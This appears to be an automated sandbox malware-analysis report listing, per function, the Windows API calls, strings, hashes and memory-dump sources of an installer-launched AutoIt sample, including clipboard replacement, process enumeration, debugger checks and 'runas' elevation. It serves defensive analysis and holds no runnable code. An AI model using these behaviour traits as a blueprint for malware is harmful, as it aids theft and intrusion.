Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714

Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
CloseHandle.KERNEL32(?), ref: 00405C9D

Strings

Error launching installer, xrefs: 00405C74

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69

Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062D1, 004062D6

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E

Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

Analysis Process: Climb.comPID: 7780, Parent PID: 7284COMMON

Execution Graph

Execution Coverage:	3.3%
Dynamic/Decrypted Code Coverage:	0.8%
Signature Coverage:	4%
Total number of Nodes:	2000
Total number of Limit Nodes:	63

Executed Functions

Function 000B5FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 000B5FF7

Part of subcall function 000B8577: _wcslen.LIBCMT ref: 000B858A

GetCurrentProcess.KERNEL32(?,0014DC2C,00000000,?,?), ref: 000B6123
IsWow64Process.KERNEL32(00000000,?,?), ref: 000B612A
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 000B6155
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 000B6167
GetNativeSystemInfo.KERNEL32(?,?,?), ref: 000B6175
FreeLibrary.KERNEL32(00000000,?,?), ref: 000B617C
GetSystemInfo.KERNEL32(?,?,?), ref: 000B61A1

Strings

kernel32.dll, xrefs: 000B6150
GetNativeSystemInfo, xrefs: 000B6161
|O, xrefs: 000F50F7

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: f4bfb05894389e94c0d4a760aecac215ad3d280d00fa3cd36348b8e9ab334a09
Instruction ID: 9784386c0b954ea4d8d5b1398cb0ce92c778ec1c1a83d7fedfb5c99df8f05c96
Opcode Fuzzy Hash: f4bfb05894389e94c0d4a760aecac215ad3d280d00fa3cd36348b8e9ab334a09
Instruction Fuzzy Hash: 9CA1723190A6C4DFC713CB6A7C611E93F947B2F301B084899DE81A7A62C63D47C4DB21

Function 052E1000 Relevance: 19.6, APIs: 13, Instructions: 81
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000001), ref: 052E1032
OpenClipboard.USER32(00000000), ref: 052E103C
GetClipboardData.USER32(0000000D), ref: 052E104C
GlobalLock.KERNEL32(00000000), ref: 052E105D
GlobalAlloc.KERNEL32(00000002,-00000004), ref: 052E1090
GlobalLock.KERNEL32 ref: 052E10A0
GlobalUnlock.KERNEL32 ref: 052E10C1
EmptyClipboard.USER32 ref: 052E10CB
SetClipboardData.USER32(0000000D), ref: 052E10D6
GlobalFree.KERNEL32 ref: 052E10E3
GlobalUnlock.KERNEL32(?), ref: 052E10ED
CloseClipboard.USER32 ref: 052E10F3
GetClipboardSequenceNumber.USER32 ref: 052E10F9

Memory Dump Source

Source File: 00000015.00000002.2509972243.00000000052E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: true

Associated: 00000015.00000002.2509951375.00000000052E0000.00000002.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2509992334.00000000052E2000.00000002.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_52e0000_Climb.jbxd

Similarity

API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
String ID:
API String ID: 1416286485-0
Opcode ID: 5cae73dd5058b29d49aebfb63b42d4c2deaee97ac53901659af0e1c672fbf49f
Instruction ID: 95621cc8462a48d86a17ea300d260fc6ba4750fd6d09622e7b56f00cb63d3ff3
Opcode Fuzzy Hash: 5cae73dd5058b29d49aebfb63b42d4c2deaee97ac53901659af0e1c672fbf49f
Instruction Fuzzy Hash: D7216236628251DBD7252B71FC0EB6A7BACFF04651F440438F94BDA190EE718C10CAA1

Function 000B338B Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 148
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,000B3368,?), ref: 000B33BB
IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,000B3368,?), ref: 000B33CE
GetFullPathNameW.KERNEL32(00007FFF,?,?,00182418,00182400,?,?,?,?,?,?,000B3368,?), ref: 000B343A

Part of subcall function 000B8577: _wcslen.LIBCMT ref: 000B858A

Part of subcall function 000B425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,000B3462,00182418,?,?,?,?,?,?,?,000B3368,?), ref: 000B42A0

SetCurrentDirectoryW.KERNEL32(?,00000001,00182418,?,?,?,?,?,?,?,000B3368,?), ref: 000B34BB
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 000F3CB0
SetCurrentDirectoryW.KERNEL32(?,00182418,?,?,?,?,?,?,?,000B3368,?), ref: 000F3CF1
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,001731F4,00182418,?,?,?,?,?,?,?,000B3368), ref: 000F3D7A
ShellExecuteW.SHELL32(00000000,?,?), ref: 000F3D81

Part of subcall function 000B34D3: GetSysColorBrush.USER32(0000000F), ref: 000B34DE
Part of subcall function 000B34D3: LoadCursorW.USER32(00000000,00007F00), ref: 000B34ED
Part of subcall function 000B34D3: LoadIconW.USER32(00000063), ref: 000B3503
Part of subcall function 000B34D3: LoadIconW.USER32(000000A4), ref: 000B3515
Part of subcall function 000B34D3: LoadIconW.USER32(000000A2), ref: 000B3527
Part of subcall function 000B34D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000B353F
Part of subcall function 000B34D3: RegisterClassExW.USER32(?), ref: 000B3590

Part of subcall function 000B35B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000B35E1
Part of subcall function 000B35B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000B3602
Part of subcall function 000B35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,000B3368,?), ref: 000B3616
Part of subcall function 000B35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,000B3368,?), ref: 000B361F

Part of subcall function 000B396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 000B3A3C

Strings

It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 000F3CAA
AutoIt, xrefs: 000F3CA5
runas, xrefs: 000F3D75

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 683915450-2030392706
Opcode ID: d54feda8b3503868f1d291552d0a7fd4e455c28e00a1679f3cf0a8aa24a62777
Instruction ID: 238b09bd11cc08222cb0ac961bc81c2d7f477b3443c16b01d5cdc17b899ea09a
Opcode Fuzzy Hash: d54feda8b3503868f1d291552d0a7fd4e455c28e00a1679f3cf0a8aa24a62777
Instruction Fuzzy Hash: 3A51E470208345AECB12FF60AC11DFE7BF8AB95744F14042CF591525A3DB389B89DB62

Function 0011DC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000B5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000B55D1,?,?,000F4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 000B5871

Part of subcall function 0011EAB0: GetFileAttributesW.KERNEL32(?,0011D840), ref: 0011EAB1

FindFirstFileW.KERNEL32(?,?), ref: 0011DCCB
DeleteFileW.KERNEL32(?,?,?,?), ref: 0011DD1B
FindNextFileW.KERNELBASE(00000000,00000010), ref: 0011DD2C
FindClose.KERNEL32(00000000), ref: 0011DD43
FindClose.KERNEL32(00000000), ref: 0011DD4C

Strings

\*.*, xrefs: 0011DC9D

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: aa27b0f2e9b015c83163d15630bd562aa7977814b899a016a0a21a58814ae67f
Instruction ID: 1290232b3522705c572efbfe1687128c6053b0fe1abfe6fdf4cb5894082f109c
Opcode Fuzzy Hash: aa27b0f2e9b015c83163d15630bd562aa7977814b899a016a0a21a58814ae67f
Instruction Fuzzy Hash: 62315C31008345ABC705EF60E8919EFB7E8BF96300F404D6DF5D5921A2EB65DA49CBA3

Function 0011DD87 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0011DDAC
Process32FirstW.KERNEL32(00000000,?), ref: 0011DDBA
Process32NextW.KERNEL32(00000000,?), ref: 0011DDDA
CloseHandle.KERNEL32(00000000), ref: 0011DE87

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: cca48a6d9e308b864fc47efcb763191539a111ae338b42b9b15b65044ede0d63
Instruction ID: 9a066eb7bb2ffb322c39a9e8f2b81b79bc82c8ed7087d407b259fac8bdeea45a
Opcode Fuzzy Hash: cca48a6d9e308b864fc47efcb763191539a111ae338b42b9b15b65044ede0d63
Instruction Fuzzy Hash: 21318071108301AFD714EF60DC85BEFBBE8AF99750F04092DF585871A2EB719989CB92

Function 000BEE30 Relevance: 21.6, APIs: 14, Instructions: 630windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 000BEF07
timeGetTime.WINMM ref: 000BF107
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000BF228
TranslateMessage.USER32(?), ref: 000BF27B
DispatchMessageW.USER32(?), ref: 000BF289
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000BF29F
Sleep.KERNEL32(0000000A), ref: 000BF2B1

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 6edd8addb62d69bb845df955dc829b10ac9ace99d246252689dffd9567884570
Instruction ID: e988ed2e98c3d0a668402fc55afb21f3a2ba7d72b2129f5bc8ce033dc798a7e5
Opcode Fuzzy Hash: 6edd8addb62d69bb845df955dc829b10ac9ace99d246252689dffd9567884570
Instruction Fuzzy Hash: 4842E270608342EFD729DF24C884BFAB7E5BF95304F144529F5A5872A2C7B1E984CB92

Function 000B3624 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 000B3657
RegisterClassExW.USER32(00000030), ref: 000B3681
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000B3692
InitCommonControlsEx.COMCTL32(?), ref: 000B36AF
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000B36BF
LoadIconW.USER32(000000A9), ref: 000B36D5
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000B36E4

Strings

0, xrefs: 000B3639
+, xrefs: 000B3640
AutoIt v3 GUI, xrefs: 000B3673
TaskbarCreated, xrefs: 000B3687

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: fe7cba61ca6808e2cd98d1c70bb6cad2e7cf5e2d270be7793db9f99073885d6f
Instruction ID: 3dbfe2c30bedf2e860e0727d2439fa06bfcb336738c4e69a6f5e55cd672b3402
Opcode Fuzzy Hash: fe7cba61ca6808e2cd98d1c70bb6cad2e7cf5e2d270be7793db9f99073885d6f
Instruction Fuzzy Hash: BC21E0B5D01318AFDF01DFA4E889A9DBBB4FB09718F10511AFA11A76A0D7B44680CF90

Function 000F09DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000F071A: CreateFileW.KERNEL32(00000000,00000000,?,000F0A84,?,?,00000000,?,000F0A84,00000000,0000000C), ref: 000F0737

GetLastError.KERNEL32 ref: 000F0AEF
__dosmaperr.LIBCMT ref: 000F0AF6
GetFileType.KERNEL32(00000000), ref: 000F0B02
GetLastError.KERNEL32 ref: 000F0B0C
__dosmaperr.LIBCMT ref: 000F0B15
CloseHandle.KERNEL32(00000000), ref: 000F0B35
CloseHandle.KERNEL32(?), ref: 000F0C7F
GetLastError.KERNEL32 ref: 000F0CB1
__dosmaperr.LIBCMT ref: 000F0CB8

Strings

H, xrefs: 000F0C3D

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 5128ff110b421fa3ad5a2e01912ee0776991886ae0d4c80c498e0afc0de1ac41
Instruction ID: beb771199dc82d599a6ca34e7533f33e51acf01c00397bf162c9dc89767d7560
Opcode Fuzzy Hash: 5128ff110b421fa3ad5a2e01912ee0776991886ae0d4c80c498e0afc0de1ac41
Instruction Fuzzy Hash: 20A13632A042499FDF18AF68D851BBD7BE0AB06324F14015AF911DF7A2D7319D42DB52

Function 000B52A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000B5594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,000F4B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 000B55B2

Part of subcall function 000B5238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 000B525A

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 000B53C4
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 000F4BFD
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 000F4C3E
RegCloseKey.ADVAPI32(?), ref: 000F4C80
_wcslen.LIBCMT ref: 000F4CE7
_wcslen.LIBCMT ref: 000F4CF6

Strings

Software\AutoIt v3\AutoIt, xrefs: 000B53BA
\Include\, xrefs: 000B5381
\, xrefs: 000F4CFC
Include, xrefs: 000F4BF4, 000F4C35

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: e6f217d40e62c2fa3fe91e272f29b6a476d8380fdccb7f4689cb6678d0625e9b
Instruction ID: 50094eadc1033f45bf57304912bfa2c185dd4039cd4dade0286f67e31fdfa117
Opcode Fuzzy Hash: e6f217d40e62c2fa3fe91e272f29b6a476d8380fdccb7f4689cb6678d0625e9b
Instruction Fuzzy Hash: 47718C715043059BC710EF65EC819EBBBE8FF98B40F84042EF95193661EB719B89CBA1

Function 000B34D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 000B34DE
LoadCursorW.USER32(00000000,00007F00), ref: 000B34ED
LoadIconW.USER32(00000063), ref: 000B3503
LoadIconW.USER32(000000A4), ref: 000B3515
LoadIconW.USER32(000000A2), ref: 000B3527
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000B353F
RegisterClassExW.USER32(?), ref: 000B3590

Part of subcall function 000B3624: GetSysColorBrush.USER32(0000000F), ref: 000B3657
Part of subcall function 000B3624: RegisterClassExW.USER32(00000030), ref: 000B3681
Part of subcall function 000B3624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000B3692
Part of subcall function 000B3624: InitCommonControlsEx.COMCTL32(?), ref: 000B36AF
Part of subcall function 000B3624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000B36BF
Part of subcall function 000B3624: LoadIconW.USER32(000000A9), ref: 000B36D5
Part of subcall function 000B3624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000B36E4

Strings

0, xrefs: 000B355F
#, xrefs: 000B3566
AutoIt v3, xrefs: 000B357F

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin
